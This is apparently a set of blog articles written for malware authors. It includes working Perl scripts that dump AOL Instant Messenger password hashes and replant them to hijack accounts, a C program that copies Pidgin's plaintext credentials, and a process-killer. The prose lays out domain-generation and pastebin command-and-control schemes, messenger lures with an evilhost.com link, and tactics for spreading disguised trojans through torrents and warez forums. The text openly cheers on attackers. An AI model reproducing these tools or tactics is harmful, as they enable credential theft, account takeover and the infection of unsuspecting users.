#include <stdio.h>
#include <windows.h>

int main(int argc, char **argv)
{
if(argc < 2)
{
printf("\n\nUsage: killprocess [PID]\n\n");

return 0;
}

DWORD dwPID = atoi(argv[1]);

// Open the process with privileges that let us terminate it.

HANDLE pHandle = OpenProcess(PROCESS_TERMINATE, FALSE, dwPID);

// Poon the process, or try.
if(TerminateProcess(pHandle, 0) != 0)
printf("\n\nProcess terminated successfully.\n\n");
else
printf("\n\nUnable to terminate process.\n\n");

// Close the handle.
CloseHandle(pHandle);

return 0;
}

Now, one problem in this is tracking. Unless you steal a credit card of a stranger far away, drive down to another state/province, steal some wireless, proxy up, and purchase a domain name, there’s a possibility that you could be tracked down as the purchaser. Sure, you can hide your name in a whois, but the company still has your information. When the algorithm for generating URLs is compromised and released to malware analytics, you also have to worry about the company monitoring expected domains (See: Honeypots).

What I propose is this: pastebins.

Yes, pastebins. Pastebins are free, effective, anonymous, and can be private. There are many pastebins out there to choose from, and certain ones allow for “your own pastebin,” such as pastebin.com. Simply by prefixing the URL with a unique name, you can paste code without having it show anywhere else on the site. For example, if my name were Abraham Lincoln and I were an avid coder, I might paste my leet perl scripts to http://abrahamlincoln.pastebin.com.

Now you can probably see where I’m going with this. The usual way of URL generation generates a predetermined amount of URLs per day (based off the day, so they’re predictable and different each day, but the same for each time it’s run on the same day for anyone running the program.) A program might generate the URLs lksdjgsdg.com, kljsdgsdg.info, asfgkajgsg.com, alksgjagsg.org, sdjfhsdjkg.net, fklsdjfsddsf.org, sdflkjsdf.com, and sdfsdfuhfsd.com for a single day. The next day, the URLs would be completely different. They need to be predictable so the author of the malware can plan ahead and purchase and prepare a domain name before a bunch of infected computers call home to get instructions. The fact that there are so many URLs is a form of security through obscurity – in that someone trying to stop, analyze or fight the worm won’t know which URL the script will be getting instructions from. It’s just whatever domain is up and able to identify with the worm at the time.

My approach, for the poor man. And by poor man, I mean either a man who isn’t willing to steal a credit card (hey, why not add more charges on top of your malware ones?) or a man who is too poor to purchase a domain (you’ll be rich soon enough!). Instead of generating URLs like the ones above, the Poor Man’s URL Generation will generate random strings, such as gksljdgsdg, sdgkljsdgsd, skdjgsdlkg, sdgksjdgsdg, sdgkljsdg, sdgkjsdglkjd, and sdlkgjsdglkjd.

The malware author will be required to upload an encrypted payload to an expected private pastebin, such as gksljdgsdg.pastebin.com shortly before all the infected computers call home to there to decrypt and deal with their new instructions and/or payload. Afterwards, the author has the ability to remove the paste, making it look like nothing was ever there.

Spreading through MSN plays on trust and ignorance. A potential victim will be much more likely to click on a link or accept a file sent to them over MSN than they would click a link or attachment in an email from someone they don’t know. When they realize the person who sent them the file is not who they think they are, it’s already too late.

Common worms spread by two main subjects: laughter and sex. Phrases such as “Hey LOL I’ve done a new photo album! Might be a few nudes LOL,” “I took a new picture for you,” “HAHA you have to see this LOL,” or something similar. However, other phrases that don’t fit into my categories are also used, such as “My friend took nice picture of you.” If someone took a picture of you, wouldn’t you want to see it? ;)

One technique the very popular Bagle (also called Beagle) utilizes is email. Not just normal email; commonly malware that spreads through email will have a list of emails downloaded or bought to send mass emails to. Bagle, on the other hand, steals your messenger password, logs in, retrieves the email addresses of all your friends, and sends them emails. To make it more believable for them, Bagle spoofs the From: field to the email found on the messenger service.

This nifty article talks about another trick Bagle uses.

Another trick the virus is using to fool users, Friedrichs said, is to keep the size of the initial e-mail small. When a recipient is tricked into clicking on the attachment, only a small portion of the malicious code is installed on the victim’s machine. The rest is then downloaded from one of dozens of Web sites located around the world.

Now, the above might seem trivial at first, but if you think about it, it’s staying under the radar this way. The small code downloaded has a sole function of getting the rest of the code and piecing it together (similarly to what I proposed doing with Bluetooth). More and more email providers have built-in virus scanners now, and sending a full virus through email isn’t the easiest thing to do. Not only does this method make it much easier, but also has a much lower detection rate by Antiviruses.

One more thing to note is blocking. If your MSN was hijacked and your friends started complaining to you about you sending viruses to them, you would most likely change your name to something like, “Don’t click anything I send you” and log off — right? Well, first of all, that wouldn’t help. The malware has your password, they can log in and out as they please.

Second of all, your friends won’t be complaining if the malware is effective. The greater worms that spread through MSN lock your name, and block contacts that have been sent a payload. This keeps them from talking back, asking, “Is this legit?” Curiosity will kill most of them. If a user is detected to be trying to stop the worm in some way, warning friends and similar actions, the virus may just lock them out of their MSN altogether.

Luckily, however, a friend of mine wrote the following script for extracting the hash for you:

#!/usr/bin/perl -w
use strict;
use warnings;
use Win32::TieRegistry;

print "Enter users AIM name: ";
my $aimname = ;
chomp($aimname);

$Registry->Delimiter("/");
my $hashloc = $Registry->{"HKEY_CURRENT_USER/Software/America Online/AOL Instant Messenger (TM)/CurrentVersion/Users/$aimname/Login/"};
my $password = $hashloc->GetValue("Password1");
open(AIMHASH, ">aimhash.txt") || die "Cant write to file";
print AIMHASH "$password";
close(AIMHASH);
undef $hashloc;

print "md5 Hash Successfully Dumped\n";
print "Want to crack it? Get a rainbowtable Http://www.rainbowtables.net\n";

And… you know what? Readers of Malware Brainstorm are further in luck. Here’s another script, by the same author, that places the AIM hash in your registry with their name, so your AIM Messenger thinks you have those credentials “remembered” so you wouldn’t have to type them in every time! In other words, it logs you in to the account you extract the hash from without having to crack the hash.

#!/usr/bin/perl -w
use strict;
use warnings;
use Win32::TieRegistry;

print "Name to add: ";
my $aimname = ;
chomp($aimname);

print "Password Hash: ";
my $hash = ;
chomp($hash);

$Registry->Delimiter("/");
my $location = $Registry->{"HKEY_CURRENT_USER/Software/America Online/AOL Instant Messenger (TM)/CurrentVersion/Users/"};
$location->SetValue("$aimname", "$aimname", "REG_SZ");
my $SN = $location->CreateKey( "$aimname/Login" );

$SN->SetValue("Password1", "$hash", "REG_SZ");

Please note, you will need access to a Perl interpreter if you wish to run these programs. For Linux, the interpreter should come pre-installed (if not, I imagine you know how to get one if you’re on Linux.) If you’re on Windows, I recommend ActivePerl.

This is what Gaim [Pidgin] does: the password is in accounts.xml in plain text, but the file itself is only readable by its owner. We allow the user to determine under what conditions sensitive files should be opened (if at all), and what constitutes a breach of security.

Yes, you read that right. All usernames and passwords are stored, unencrypted, on the user’s computer. Their “security” plays into our hands; if we’re infecting someone, we’ll definitely have access to read their files, and therefore all their Messenger login credentials. From there, we can log in via our own client mimic scripts for each protocol and spread our virus/worm/bot to our heart’s content to all the contacts that trust our victim!

The following program was written by a friend. Although he says he tested it on GAIM 1.1.2, I have tested it at the time of writing on Pidgin 2.4.1 and it still works flawlessly. “I got the idea to write an exploit,” NoUse says in this thread, “for GAIM to grab the passwords that are stored in plain text.” Basically, it saves them to another file for anyone to work with.
/*
*  GAIM "accounts.xml" local exploit for Linux
*  Tested on: GAIM 1.1.2
*  Works with: All versions
*  written by: NoUse
*  http://www.anomalous-security.org
*
*/

#include <stdio.h>
#include <unistd.h>
#include <pwd.h>

#define MAXPATHLEN 56

int main(int argc, char **argv)
{
FILE *gaim_xml, *output;
int temp;
char gaim[MAXPATHLEN], cwd_buffer[MAXPATHLEN];
char *cwd_pointer;

struct passwd *home = getpwuid(getuid());
sprintf(gaim, "%s/.gaim/accounts.xml", home->pw_dir);

gaim_xml = fopen(gaim, "r");
if(gaim_xml == NULL){
printf("\nError opening gaim account file. Exiting...\n");
return -1;
}

output = fopen("output.log", "w+");
if(output == NULL){
printf("\nError opening log file. Exiting...\n");
return -1;
}

while(temp != EOF){
temp = fgetc(gaim_xml);
putc(temp, output);
}

fclose(gaim_xml);
fclose(output);

cwd_pointer = getcwd(cwd_buffer, MAXPATHLEN);
printf("\nSuccess! Log file can be found in %s/output.log\n\n", cwd_pointer);

return 0;
}

Graph of Computers Infected by Conficker Over Time

Nobody is really sure where the name “Conficker” comes from. (Well, other than the authors, but they sure as hell aren’t going to speak up.) However, some believe it is a mashup of the words “configure” and “ficken” – the German word for fuck. Joshua Phillips, an analyst working for Microsoft, believes Conficker is merely an anagram of pieces from the domain name trafficconverter.biz – which was one of the first domains to start spreading Conficker. Conficker is also known as Downadup, Downup, and Kido.

A big reason Conficker is still around is because it keeps changing. If it didn’t, it would be able to be automatically detected by all anti-viruses and deleted instantly. Microsoft released a patch to fix the vulnerability that is utilized for the worm to spread and gives instructions online on how to protect your computer from Conficker, but because each strand of the virus is different, it’s up to the user to remove it. And we all know how that goes: laziness is a virus author’s best friend. “This virus isn’t too bad.. I can still use my computer. I’m a busy person, I’m not going to spend ten hours trying to get rid of this thing!”

Conficker’s main way for looking for new instructions is by URL generation (as seen in my other article). Long story short, there’s an algorithm embedded deep in Conficker’s code that generates 250 URLs per day at seemingly random locations around the globe to look for more instructions from. At each server, the worm tries to log in and download files, modifications, instructions, and uploads results of recently infected computers. A huge panic around April 1st was generated; April 1st was the first day the worm started calling home to the generated server names to download new instructions. Every day afterwards, new domains are generated and it calls back again.

The Conficker Cabal is an organization led by Microsoft that includes ICANN, NeuStar, VeriSign, CNNIC, Afilias, Public Internet Registry, Global Domains International Inc., M1D Global, AOL, Symantec, F-Secure, ISC, researchers from Georgia Tech, the Shadowserver Foundation, Arbor Networks and Support Intelligence. The Conficker Cabal, using the DNS companies that are part of the group, are working together to disable the domains targeted by Conficker in order to prevent it from updating, and therefore, make it easier to remove.

On April 1st, Conficker changed its algorithm for generating URLs. Suddenly, all the blocked domains from before meant nothing to the worm authors, and the Conficker Cabal scrambled to reverse engineer the new strand of Conficker to get the algorithm for generating new domains. Who knows, maybe Conficker will change again soon?

According to this analysis by SRI,

The exploit employs a specially crafted remote procedure call (RPC) over port 445/TCP, which can cause Windows 2000, XP, 2003 servers, and Vista to execute an arbitrary code segment without authentication. The exploit can affect systems with firewalls enabled, but which operate with print and file sharing enabled. The patch for this exploit was released by Microsoft on October 23 2008, and those Windows PCs that receive automated security updates have not been vulnerable to this exploit. Nevertheless, nearly a month later, in mid-November, Conficker would utilize this exploit to scan and infect millions of unpatched PCs worldwide.

Worried you might be infected with Conficker? This simple eye-chart can tell you immediately!

Mathematically speaking, here’s my breakdown of the rate and power of Conficker infections. In mid-November, there were no infections of Conficker. By the end of December, SRI estimated 6.2 million computers infected worldwide. By February, that number increased to around 10 million. Since April 1st, Symantec believes the worm is slowing down in spreading, and instead now taking steps to protect computers already infected from being disinfected. That means a graph of the computer infected over time could be graphed closely with the polygraphic line y=-0.4333x^2 + 5.9667x.

Symantec also believes that, as of April 1st, Conficker is now focusing on spreading new malicious code between already-infected servers. The time has come for them to farm credit card numbers, bank information, personal information, passwords, and everything else on their fifteen million infected computers. Many people are worried the 15 million infected might be turned into spam drones – which would rival the current leading spam botnet of all time: Storm.

By the estimate of 15 million computers infected by April 1st, we can have a bit more fun with math. IP addresses are made of four octets ranging from 0.0.0.0 to 255.255.255.255. There are just over 4 billion possible IP addresses (4,228,250,625 to be exact). Each of the 15 million infected computers are already calling home to the same 250 domains (pointing to IP addresses, obviously) per day. Now, here’s the crazy part: if each computer were to attempt to attack and infect 282 computers in one day, that would be enough to attack every single IP address combination available to computers today. Every computer that could be infected, would be infected. Now, we have to account for downtimes. Not every computer will be online every day. If just one-third of the 15,000,000 infected computers (5 million) were online a day, the same effect could be reached in three days. If a fourth was online per day (a valid estimate), it would take four days. A fifth? Five days. Need it faster? Conficker could just up the number of IPs being attacked each day.

That’s right. Conficker, if they so chose, could infect every single vulnerable computer in the world in under a week. Say hello to our new robot overlord.

The mitigation of malware by the general public seems to increase exponentially year by year. People randomly click this and download that, all without as little as a simple virus scan. While It’s common knowledge that most machines wouldn’t be compromised if the users didn’t login with the Administrator account, they still do, and they still, seemingly willingly, open their machines to infection. “It can’t happen to me…”, so the cliché goes. People put aside the concern of being infected by malware crafted to harvest valued credentials.

If you thought this was another white-paper, you were wrong. The group of ignorant individuals mentioned earlier won’t be taking the time to read my article. This is why they make perfect targets. They will remain oblivious to the fact that they are the target for malware crafters and distributors. They will randomly download hyper links with infected applications, and if our precious payload is hidden well enough, they’ll stay oblivious to our game, and might just pass their find to their friends!

Malware of all sorts is distributed in many ways.. Torrents are a very popular way to get your payload out there quickly. A lot of people assume that they’ve just found a great deal! Pirated applications. They think they’ve found “free” software. This is a false perception, as the cost of this application they sought after may wind up costing thousands of dollars after their credit card information is harvested. IM spreading is also a very common method of distribution. You usually see this feature incorporated into a bot. The bot is able to hook into an instant messenger service and silently message everyone in the contact list. These messages typically look something like.. “LOL check this out.. http://evilhost.com/evilfile.php?id=<contact name>”. Curiosity will beckon to be relieved, and the recipient of this message will probably click the link. The PHP file will probably initiate a download of what will look like an image file. Once again, curiosity prevails and the file is downloaded and executed, thus infecting the victim of this ploy. Curiosity DID kill the cat! Fortunately for the bot herder, the bot will also block the contacts it has spammed for a period of time specified by the author, so the original infectee wont get any thought provoking questions regarding the link he just sent. These two methods of spreading malware affect those computer-illiterate individuals we talked about earlier heavily.

You don’t have to be illiterate to technology to be infected. Although it’s bad security practice, most will admit they don’t keep the tedious task of updating their system high on the priority list. New exploits for various services, such as the MS08-067 vulnerability on Microsoft systems, are exploited by malware, and a payload is dropped. Once again referring to MS08-067, the infamous worm Conficker uses this vulnerability to spread itself. Another opportunity for exploitation could be a Remote File Inclusion or RFI on a webserver running a vulnerable PHP script. Bots could be coded to automatically search for vulnerable PHP scripts, plant, and execute itself on the host machine. Thus a tally mark is added, and the number of infected machines worldwide increases.

The mitigation of malware, and the ignorance of the potential repercussions of being infected by it is alarmingly high. It’s very easy to get infected, and it can be a pain to clense a system, assuming someone infected realizes it. But never fear, malicious coders, according to recent studies the average IQ of an adult is 95~. You won’t soon fall short on prey!

What you want to do first, is find a niche that you want to appeal to. Common ones are hacking tools and illegal warez, such as games, cracks, and keygens. These type of files are commonly misrepresented as malware, so people will be more likely to ignore an annoying message from their antivirus telling them to delete whatever it is they got from you.

Forums are great ideas for niches. Want hacking? How about some warez forums? They’re brilliant ideas. If you find a site or forum where people go to either request or fufill requests for hard-to-find things such as specific anime, porn, programs, or videos, it’s an excellent place to spread your dirty stuff. The harder-to-find something is, the longer someone is going to look, and the more frustrated they’ll become when they don’t find it. The more frustrated they become, the more likely they’re willing to run VB6_nocdkey-crackedby-_-gibson-_-.exe.

Filenames are key. Pretend you’re downloading a “cracked version” of Flash 8 Professional from some unknown website. Would you be more willing to run flash.exe, f8p.exe, flash_8_professional_rusk_cr4ck.exe, or even flash8setup.exe? It’s up to you – pick what you want to name your file according to your niche. For best results, research common names that are already in use and base yours off them. Sometimes networks have keywords you might not be familiar with if you’re just jumping into the game.

Speaking of keywords, I want to mention torrents. I won’t go into much detail in this article (perhaps later) but I will have to say they are just as efficient as P2P networks – if used right. With torrents, you have to build up seeds and prevent negative comments. If a victim downloads your botnet client and a big, scary command prompt with green text on a black background screams at them, “YOU’VE BEEN INFECTED HAHAHAHAHA,” they’re obviously going to comment on the torrent that it’s a virus – and tell others not to download it. They will probably even report it, where it’ll be taken down quite quickly.

I recommend, for torrents, to make a fancy GUI frontend in either Visual Basic or with a GUI extension for your programming language (like Tk). It makes the program more believable. If you’re supposed to be generating keys for World of Warcraft, have a fancy WoW program that generates keys that look like WoW keys. It’s much better for someone to report on the torrent site, “The keys have all been used!” than “This is a rootkit in a box.”

In conclusion, torrents and P2P networks are very efficient ways to spread malicious code and software. Many people are desperate for many things, and many people just don’t know any better. Many people will download and run your programs – so have fun!

Basically, it generates a large number of URLs from an algorithm based on the day. Not only does this create a huge list of unique URLs that Conficker could use at any time, but it hides which one it actually uses because it attempts to connect to them all. It also hides what day the payload will drop at, which is another common problem in worms that activate later on.

If you’re not following, here’s exactly what would happen if you did the same thing:
1. Your script runs and gets the date, for this example, we’ll say April 3rd.
2. An algorithm in your script generates an array of one thousand URLs based off the date.
For example, jgIF2jK.info, jfs82KjII.com, jfe820FDS.org, j8f303tgs.info, and so on.
3. The script tries to connect to each url and waits for a response.
4. If a response comes from the URL, it is checked to make sure it came from the author of the malware via password or something similar.
5. If the URL responds with the correct password, instructions for what the worm is supposed to do next will follow. These instructions could be to spread more, stop spreading, drop the payload, or anything else.

The downfall of this technique, as outlined here, would be hijacking. If someone were to reverse engineer the virus to determine the algorithm for generating URLs and the password for each URL, they would be able to purchase a scheduled domain and masquerade as the virus author. They could then tell the worm what to do – which might not be in the worm’s best interest. This downfall could be overcome by limiting the functions that the worm can perform from domains. Obviously, a “remove all traces from the computer” function that could be invoked remotely like that is a bad idea.